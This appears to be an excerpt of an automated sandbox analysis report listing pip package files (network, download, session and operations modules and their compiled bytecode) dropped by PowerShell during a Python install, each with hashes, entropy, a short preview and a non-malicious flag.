                                                                                                    Preview:........=.Cf................................d.Z.d.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!....G.d...d.e"........Z#d.e$d.e$d.e.d.e.f.d...Z%..G.d...d.........Z&y.).z.Lazy ZIP over HTTP..HTTPRangeRequestUnsupported..dist_from_wheel_url.....)...bisect_left..bisect_right)...contextmanager)...NamedTemporaryFile)...Any..Dict..Generator..List..Optional..Tuple)...BadZipFile..ZipFile)...canonicalize_name)...CONTENT_CHUNK_SIZE..Response)...BaseDistribution..MemoryWheel..get_wheel_distribution)...PipSession)...HEADERS..raise_for_status..response_chunksc...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/lazy_wheel.pyr....r........s.........r .....name..url..session..returnc..........................t.........|.|.........5.}.t.........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18783
                                                                                                    Entropy (8bit):5.508650572055059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:0A5O3ATqK1yo9Uhmo3ZcmrVDW34lNfouw7CIFv+hF6zrN:0A5OeUcgnfO+hFMrN
                                                                                                    MD5:98634B071EE912D7A9C484B966CAC739
                                                                                                    SHA1:65CF6202B8BCFB58E5CBD64DBCA6E1CC10FDBD4D
                                                                                                    SHA-256:12AAB06AA2860883281A480306C5A6B69D725595B4CEA635C902FD426D45147D
                                                                                                    SHA-512:670E92B260FBDC78BD2EFAD906924A9290F7BE9906FE0482B3AD07D32B563131F647126707B817F19761274C515C1FC4460E1AC989DA8711C2C065BEE98D5E9C
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.I..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z ..d.d.l!m"Z"m#Z#..d.d.l!m$Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZA..e.r.d.d.lBmCZC..d.d.lDmEZE....e.j...................eG........ZHe.eIeIe.e.eJeIf.........f.....ZK..e.j...................d.e.............g.d...ZMe.eK....eNd.<...d.ZOd.ePf.d...ZQd.eIf.d...ZR..G.d...d e#........ZS..G.d!..d"........ZT..G.d#..d$eTe%........Z$..G.d%..d&eTe ........Z...G.d'..d(e$........ZU..G.d)..d*e.........ZV..G.d+..d,e.j...........................ZXy.)-zhPipSession and supporting code, containing all pip-specific.network request configuration and behavior.......N)...TYPE_CHECKING..Any..Dict..Generator..List..Mapping..Optional..Sequence..Tuple..Union)...reques
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2262
                                                                                                    Entropy (8bit):5.570814558468571
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:N68uaLawawkR5fTDUFH9t+ev1U4a4IfbMkQT7g4qJYQ0n:NMwbkBQFHH64gdQg4qYQ0n
                                                                                                    MD5:628E1BEEA07576C543927AD86DAC31D2
                                                                                                    SHA1:EC44BDD342B4F41696960DDEBEA06E717B345286
                                                                                                    SHA-256:F2E5325F36FDE9508AEFDE0AD73D71C6E0745AC701BDD697BD749B4432348733
                                                                                                    SHA-512:19456CFDBE00A341658074199DB37E4C61EAF50350B1F896FAB4007C24076818C933F80681E4600E68E13267D4EF4836487EF333240A3D6B18310921FF7E1C41
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................U.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.i.Z.e.e.e.f.....e.d.<...d.e.d.d.f.d...Z.e.f.d.e.d.e.d.e.e.d.d.f.....f.d...Z.y.)......)...Dict..Generator)...CONTENT_CHUNK_SIZE..Response)...NetworkConnectionErrorz.Accept-Encoding..identity..HEADERS..resp..returnNc...........................d.}.t.........|.j...................t.................r...|.j...................j...................d.........}.n.|.j...................}.d.|.j...................c.x.k...r.d.k...r"n...n.|.j.....................d.|...d.|.j.......................}.n6d.|.j...................c.x.k...r.d.k...r!n...n.|.j.....................d.|...d.|.j.......................}.|.r.t.........|.|.............y.#.t.........$.r...|.j...................j...................d.........}.Y...w.x.Y.w.).N..z.utf-8z.iso-8859-1i....i....z. Client Error: z. for url: iX...z. Server Error: )...response)...isinstance..reason..bytes..decode..UnicodeDecodeError..status_code..urlr....).r......http_er
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2958
                                                                                                    Entropy (8bit):5.455372927349252
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:GSB++JWLcdP++/1eqoZ4VE/BX30SljugoDRcJ5zX60687i6llPLmR:e+JWLcc+ds3jp3zX6z0L2
                                                                                                    MD5:7CCB30F58B496D13994E52B8E54CD067
                                                                                                    SHA1:147CB826B9094FB259678B88B5B8D416F4425623
                                                                                                    SHA-256:881D63D24B2F250F5C976D5B1C992DF93C0EC285EB3B16B47455C87BA0CE5FEF
                                                                                                    SHA-512:E5B055AC616740EC8C525B43BA6D4CB3F4B85D2FE0A165F397241FAA6EC475D6A96BC9600F0786676121ACBBFB0DFFD5E236B8384E87AEC5D18EDDE12340DDD9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j&..................e.........Z...G.d...d.e.j,..................j...........................Z.y.).z#xmlrpclib.Transport implementation......N)...TYPE_CHECKING..Tuple)...NetworkConnectionError)...PipSession)...raise_for_status)..._HostType.._Marshallable)...SizedBufferc.....................^.......e.Z.d.Z.d.Z...d.d.e.d.e.d.e.d.d.f...f.d...Z...d.d.d.d.e.d.d.d.e.d.e.d.....f.d...Z...x.Z.S.)...PipXmlrpcTransportzRProvide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. ..index_url..session..use_datetime..returnNc............................t...........|.....|...........t.........j...................j...................|.........}.|.j...................|._.........|.|._.........y.).N)...super..__init__..urllib..parse..urlparse..scheme.._scheme.._session)...selfr....r....r......index_parts..__class__s....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20541
                                                                                                    Entropy (8bit):4.419441847140077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:GaxaV08sO0OLp5haOVKX2D/k5EzOEJlRL+jqrsLRjcqsWIv3LfW7Mvi+gIQFuRnG:Gaxa1p7kSTRiOQLxlITLqNXkB64oig6O
                                                                                                    MD5:1D3CF7B4C916B82AED3878328B7A9C00
                                                                                                    SHA1:B3C8663B501DE3A9B1A17EB858C83621158A3BF3
                                                                                                    SHA-256:4C2F8E716D8A5385BA475854E2A3E0417BD51F9E1A7400A9673EAC5AAF91F4D0
                                                                                                    SHA-512:BC4BC794485A676FE44A19ECE5EFDDC8EA0F012BDEABB389BEBD0171EA9BA385CCDCD1CF5203833728D1BA2B96E24B07A825EFD020AD3321822EAECAF434DFFA
                                                                                                    Malicious:false
                                                                                                    Preview:"""Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests..""".import logging.import os.import shutil.import subprocess.import sysconfig.import typing.import urllib.parse.from abc import ABC, abstractmethod.from functools import lru_cache.from os.path import commonprefix.from pathlib import Path.from typing import Any, Dict, List, NamedTuple, Optional, Tuple..from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth.from pip._vendor.requests.models import Request, Response.from pip._vendor.requests.utils import get_netrc_auth..from pip._internal.utils.logging import getLogger.from pip._internal.utils.misc import (. ask,. ask_input,. ask_password,. remove_auth_from_url,. split_auth_netloc_from_url,.).from pip._internal.vcs.versioncontrol import AuthInfo..logger = getLogger(__name__)..KEYRING_DISABLED = False...class Credentials(NamedTuple):. url: str. usernam
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3935
                                                                                                    Entropy (8bit):4.5367459930518805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:eatn8+Vt8CLtSKYrAdjB98ic5XENd02jagd02t/:VtjHpplcyPjaqPt/
                                                                                                    MD5:BD5623B783BCC7693C921082172F561C
                                                                                                    SHA1:2521F1CC06B3F0DC49CFAA39223E69BEA749BFA7
                                                                                                    SHA-256:E3C03DEF5A82CCA345BE46F9EEE18493BFB4C5AA8F4B41D68F6EF5D50353C645
                                                                                                    SHA-512:531BCD976F686F08C297C847D824FF2AC07AB2EB4FE4FC681D48203843A887CC31DEF5DA0BD674639A84E2DE545EAEA393AFCCE022171558A405493198024B9C
                                                                                                    Malicious:false
                                                                                                    Preview:"""HTTP cache implementation.."""..import os.from contextlib import contextmanager.from datetime import datetime.from typing import BinaryIO, Generator, Optional, Union..from pip._vendor.cachecontrol.cache import SeparateBodyBaseCache.from pip._vendor.cachecontrol.caches import SeparateBodyFileCache.from pip._vendor.requests.models import Response..from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._internal.utils.misc import ensure_dir...def is_from_cache(response: Response) -> bool:. return getattr(response, "from_cache", False)...@contextmanager.def suppressed_cache_errors() -> Generator[None, None, None]:. """If we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. """. try:. yield. except OSError:. pass...class SafeFileCache(SeparateBodyBaseCache):. """. A file based cache which is safe to use even when the target directory may. not be accessible or writable.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6086
                                                                                                    Entropy (8bit):4.535167015839178
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:w7W+0c7gLaX0VXLCrMiZZb0r3FAlBEm+1swUGgsMtG+1sAXhxe1Nw:w7t7xA+rLZZbe+lqJ2x
                                                                                                    MD5:33EE21DB91B4122F1E32ED1E8EA926E6
                                                                                                    SHA1:69610A1F064A6FAC3514A158BB4B45A4EED5D672
                                                                                                    SHA-256:8B44E7E79083E43ED7604158DD3C6261A09FD0E69A4D0E9249C3600AC49E575E
                                                                                                    SHA-512:4F1835E1F37F586F38A6DC091FF63ACEA677B678A4B635922A7949830CC7E3B09CB6E87250A4F870D7DEF636C90CEEFF4463D6555F280FFE46B078B0C43BA2A4
                                                                                                    Malicious:false
                                                                                                    Preview:"""Download files with progress indicators..""".import email.message.import logging.import mimetypes.import os.from typing import Iterable, Optional, Tuple..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.cli.progress_bars import get_download_progress_renderer.from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.index import PyPI.from pip._internal.models.link import Link.from pip._internal.network.cache import is_from_cache.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.misc import format_size, redact_auth_from_url, splitext..logger = logging.getLogger(__name__)...def _get_http_response_size(resp: Response) -> Optional[int]:. try:. return int(resp.headers["content-length"]). except (ValueError, KeyError, TypeError):. return None...def _prepare_download(. resp: Response,. lin
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7638
                                                                                                    Entropy (8bit):4.533018537440655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:lmeq3Fhp8FzQpt6uga8eTs/ChNn0dutBcBU88DDrUdWPpi0PB/Ql:PyKFK6u0qs/s0IoUnzUdWPPxY
                                                                                                    MD5:4C80D4FD2859B4B10C585AACC0F95FCA
                                                                                                    SHA1:90F90B661EFB4AE55C9C0E5174C5F3F36128F344
                                                                                                    SHA-256:D8F5D576E6193C23D99244057B527519B7C725678253EF855E89C6C887F0F5E5
                                                                                                    SHA-512:AB278D291E57C3D8DA0AD3DD055A61C78D0512FECCEB3D89D12512EF5295CAEF23D0BD07E4D67EE8158B1D7A100FD9793745A327E059C82C950C5E69539954FA
                                                                                                    Malicious:false
                                                                                                    Preview:"""Lazy ZIP over HTTP"""..__all__ = ["HTTPRangeRequestUnsupported", "dist_from_wheel_url"]..from bisect import bisect_left, bisect_right.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, Dict, Generator, List, Optional, Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.metadata import BaseDistribution, MemoryWheel, get_wheel_distribution.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks...class HTTPRangeRequestUnsupported(Exception):. pass...def dist_from_wheel_url(name: str, url: str, session: PipSession) -> BaseDistribution:. """Return a distribution object from the given wheel URL... This uses HTTP range requests to only fetch the portion of the wheel. containing metadata, just enough for the o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18698
                                                                                                    Entropy (8bit):4.5751244682162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yeSx8+6E6RtPmwaJDzMzK64lU61dg5cfJfWMhjP3Cn+N8Y9kMs3SZY45Y5yrGH3R:yrx5hqtPSLCqP0yG4OjH30e
                                                                                                    MD5:ED400E3CC8FE5CF4936A8A63056F2652
                                                                                                    SHA1:4AE82ECA21AF93318FBD8419A0BEF7C8350AC27B
                                                                                                    SHA-256:F6DA840C3F0989568576994E117271368F5C8D17C167A4486B4C9043FA813623
                                                                                                    SHA-512:5EA9E5BEE9E50A2E2A7C66135C313E1C6D295CC0532004B2CF4A97E041E7AE86B269F4F57C8AE6B349673E18FF22AC47B3DF0DE8B1FB8293CCF2BCB8301083EE
                                                                                                    Malicious:false
                                                                                                    Preview:"""PipSession and supporting code, containing all pip-specific.network request configuration and behavior.."""..import email.utils.import io.import ipaddress.import json.import logging.import mimetypes.import os.import platform.import shutil.import subprocess.import sys.import urllib.parse.import warnings.from typing import (. TYPE_CHECKING,. Any,. Dict,. Generator,. List,. Mapping,. Optional,. Sequence,. Tuple,. Union,.)..from pip._vendor import requests, urllib3.from pip._vendor.cachecontrol import CacheControlAdapter as _BaseCacheControlAdapter.from pip._vendor.requests.adapters import DEFAULT_POOLBLOCK, BaseAdapter.from pip._vendor.requests.adapters import HTTPAdapter as _BaseHTTPAdapter.from pip._vendor.requests.models import PreparedRequest, Response.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.urllib3.connectionpool import ConnectionPool.from pip._vendor.urllib3.exceptions import InsecureRequestWarning..from pip i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4073
                                                                                                    Entropy (8bit):4.467621998619944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:AyJmdmk/IlIqS8Jz8ZFy2u/u2EPqg9d+Ha+IIIbgmoj0:AmmYkF8JIjyJm/Pqg9d+HauJ0
                                                                                                    MD5:753632450165D0EFF8C4751A18D5CCE5
                                                                                                    SHA1:A2F5A9510319D95ADE4777BF462996CD0456E6E7
                                                                                                    SHA-256:E80E52AD42441141F16C6B5BB1CC14D8DA42CB3FB7CED883946587A51461B09F
                                                                                                    SHA-512:8549E7FC56D2D224AFA391AA6C1C884FB5B665BE38D469E139B18837A622D7E4E99CB59A827F3BB770562AD59CD9E6FB71619D786B41759ED7D9E468BD45F43C
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Dict, Generator..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.exceptions import NetworkConnectionError..# The following comments and HTTP headers were originally added by.# Donald Stufft in git commit 22c562429a61bb77172039e480873fb239dd8c03..#.# We use Accept-Encoding: identity here because requests defaults to.# accepting compressed responses. This breaks in a variety of ways.# depending on how the server is configured..# - Some servers will notice that the file isn't a compressible file.# and will leave the file alone and with an empty Content-Encoding.# - Some servers will notice that the file is already compressed and.# will leave the file alone, adding a Content-Encoding: gzip header.# - Some servers won't notice anything at all and will take a file.# that's already been compressed and compress it again, and set.# the Content-Encoding: gzip header.# By setting this to request only the identity encoding we're h
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1838
                                                                                                    Entropy (8bit):4.43781542816708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:yb9H7vgk5JYfH6+/1GFPzdvsJTxW9KMOWP:ap35Jya+dSP2JVQOWP
                                                                                                    MD5:48F03AE3E7D166533D1FE1C50465C95E
                                                                                                    SHA1:1B9D05D0166567A0F7B6D0295E5450CE8627CB64
                                                                                                    SHA-256:B00C7339A709F8DD4D5C63EF6A9F630B7CEE6164A79EFDC65ED811DBE13600F0
                                                                                                    SHA-512:F6F196C93BF36CA05C3B7D66F922D3278C85014F601B6A147F582A696770F146C08FA989279054AF80ACAC63FBB8A106EF8F1D87F70F2CD4870899E153B15E61
                                                                                                    Malicious:false
                                                                                                    Preview:"""xmlrpclib.Transport implementation."""..import logging.import urllib.parse.import xmlrpc.client.from typing import TYPE_CHECKING, Tuple..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status..if TYPE_CHECKING:. from xmlrpc.client import _HostType, _Marshallable.. from _typeshed import SizedBuffer..logger = logging.getLogger(__name__)...class PipXmlrpcTransport(xmlrpc.client.Transport):. """Provide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. """.. def __init__(. self, index_url: str, session: PipSession, use_datetime: bool = False. ) -> None:. super().__init__(use_datetime). index_parts = urllib.parse.urlparse(index_url). self._scheme = index_parts.scheme. self._session = session.. def request(. self,. host: "_HostType",. handler: str,. request_body: "SizedBuff
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):4.766397496197321
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/Vne75jDn23d6oAreKAqAIZ6Iaatgem/l:T0tVe7ZSImbsZjaatHmt
                                                                                                    MD5:526956FC1644350BCB5C9C90A98C4C85
                                                                                                    SHA1:5E2E6A75824E63A63B777BDBA8D9A2B0A95DB316
                                                                                                    SHA-256:720ED5B219F285F12E4585D72B96B3AD9EC287A92D237EC8A5C023C6BC0E3517
                                                                                                    SHA-512:5C7613913B697CCA4088958B5E79E7772E41ED300C7E1C477A9F6703AC7A5519212FAFB575A7D3EF2E8CA6C49D3AB45A2E8E908C3C141964B01320588BC88EDF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7588
                                                                                                    Entropy (8bit):5.620280868278457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qt3UWTJ1hjY5AxTXr1ysXCvBpvscGpyvv01aiY0//xB8a0x6qAPSu0Zbh:qtEWF1hEE0pkcGpyvv0T7/n8aPqu0ZF
                                                                                                    MD5:FF577669C4CD7AC751917E74D7C16A7F
                                                                                                    SHA1:47B19E95831BEF6796424AEACB3251B190A60CBF
                                                                                                    SHA-256:5F58ECA2D9D34FEFC50D1D9FB4A7148DD3267C081C26C494D7C95AE2A2574966
                                                                                                    SHA-512:815A0F522892FFF25521E1E2A014487E994D2C725AE6BE25E942129B1461A89EF4F29B180EFACD517849487BBA68100B5B2BBC1CF4C4E5CA96FC69D618BC53BC
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z e.e.e f.....Z!e.e.e.f.....Z"e.e.e.e.f.....Z#e.e.e.e"....f.....Z$e.e.e.e#....f.....Z%e.e$e%f.....Z&e.e!e&f.....Z'd.e.e!e(f.....f.d...Z)..d.d.e!d.e.e.e*g.e(f.........d.e&f.d...Z+d.e.e.....d.e'f.d...Z,d.e.e.....d.e!d.e.e.....f.d...Z-d.e.e.....d.e!d.e.e.....f.d...Z.d.e!d.d.f.d...Z/y.).z'Validation of dependencies of packages......N)...Callable..Dict..List..NamedTuple..Optional..Set..Tuple)...Requirement)...LegacySpecifier)...NormalizedName..canonicalize_name)...LegacyVersion)..)make_distribution_for_install_requirement)...get_default_environment)...DistributionVersion)...InstallRequirement)...deprecatedc.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)...PackageDetails..version..dependenciesN)...__name__..__module__
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10126
                                                                                                    Entropy (8bit):5.437263098088669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:cVFw9voYtQ3JHhpQ7EBNgtvWBUrHZKloatlhPpRQwKEKF:cVuFQJBpQ78CQBUrHVohPp5zKF
                                                                                                    MD5:65914EFADBE6829E4E8C0B03C7005889
                                                                                                    SHA1:DD85826DA43B3D731454811728FDAC4A2B724501
                                                                                                    SHA-256:99C03CBD7ADE771E20911518DF5F9F3986FFAA058417318D22DA0C56A320FC69
                                                                                                    SHA-512:75AA37D70AC2BA22B07DC117C651F475B9E7DB8594D764A9D19A9DB36EF536BA91B16C4F087FACB93B0F06EBAF373DA39D9B8B99A04D661C921DFCB9F1AD1F24
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfX&........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z ..............d.d.e.e.e!........d.e"d.e"d.e.e.e!........d.e"d.e"d.e.e!....d.e.e!d.d.f.....f.d...Z#d.e.d.e!f.d...Z$d.e.d.e f.d...Z%..G.d...d.........Z&y.)......N)...Container..Dict..Generator..Iterable..List..NamedTuple..Optional..Set)...canonicalize_name)...Version)...BadCommand..InstallationError)...BaseDistribution..get_environment)...install_req_from_editable..install_req_from_line)...COMMENT_RE)..%direct_url_as_pep440_direct_referencec.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)..._EditableInfo..requirement..commentsN)...__name__..__module__..__qualname__..str..__annotations__r............kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/freeze.pyr....r..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25756
                                                                                                    Entropy (8bit):5.261770727259946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tO2wKTo8LCImMUGJEeDjRvnPX/XK5wxK4jL7JTKRp6dLa+4sSL5WkUDuYCOY9a:XTo8OHcEURvPXfS7AL7JTKRws/piD4Oj
                                                                                                    MD5:2F86594157128E3F1246AFEA90AE00AF
                                                                                                    SHA1:F081016C30D6E201CAEC421CEBA688005EEE5CDE
                                                                                                    SHA-256:6FBC93458235FBF6A3460F00A36256FA6C86D07C439E4CA56FAC96BE7AE0810E
                                                                                                    SHA-512:C5B27C761773300787005300DA9DC6F429637D0E0A455B0CBDBE4AA8747000F4BD192F3E4048AA2907DAD19B82847CF9DAC0FFD827144FD98E75AEA006577020
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.m.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;m<Z<m=Z=m>Z>..d.d.l?m@Z@..d.d.lAmBZB..d.d.lCmDZD....e1eE........ZFd.e/d.e-d.e.d.eGd.eGd e.f.d!..ZHd"e!d#eId$eJd d.f.d%..ZK..G.d&..d'........ZL....d2d"e!d(e&d)e.eI....d*e.e6....d eLf.d+..ZM..d2d"e!d)e.eI....d*e.e6....d eLf.d,..ZN....d2d"e!d#eId(e&d$eJd)e.eI....d*e.e6....d e.eL....f.d-..ZO..d3d"e!d)eId*e.e6....d.eGd e.eI....f.d/..ZP..G.d0..d1........ZQy.)4z)Prepares a distribution for installation......N)...Path)...Dict..Iterable..List..Optional)...canonicalize_name)..)make_distribution_for_install_requirement)...InstalledDistribution)...DirectoryUrlHashUnsupported..HashMismatch..HashUnpinned..InstallationError..Meta
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):212
                                                                                                    Entropy (8bit):4.795542259093818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/Vne/n23d6oAreKAqAIiW4R6Iaatgem/l:T0tVeOImbsiDjaatHmt
                                                                                                    MD5:1D9169CB0E8C7D0AD28596B983AB2863
                                                                                                    SHA1:9EFD065C7BADBA722C13D03E5A9FA148DC7CE782
                                                                                                    SHA-256:72B9657AE3DD5473580767C72ED370FF0C0EC962373C8E3488C69D796B676809
                                                                                                    SHA-512:2DA5A69AFD8E3C8F7018F401F82E2C324EACCFFA236982501BEE403F8C4E158185174B83CA67BB95B632A5FE04B1CB448C84B2E79672450FC9B628690810D093
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........sC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/build/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7832
                                                                                                    Entropy (8bit):5.347126791084803
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4AXtOywqhfCKD9C25qXtjYMxasmMk68VjNO3G62FUkYQjVmhe/Y:4OOyhhf/D96OM8VjxFUImhl
                                                                                                    MD5:FC42209A4E099962CB5BD9FB40360B41
                                                                                                    SHA1:E553470DBC8351276C216114E7D6F18E942FD297
                                                                                                    SHA-256:D98A05D6E0CDBC5793B113553F474D40AB25B1B3E97EFEAB5DA24944035A4E4F
                                                                                                    SHA-512:50E560A949CCCA293FBF217B0444B2F61C8361D9545F7AC7DF2BA698870B3A7B6C4980D000DE63EE8ABE6A0FE9759C362E3FB47D5625EA8871B9BD7F02CFD9E8
                                                                                                    Malicious:false
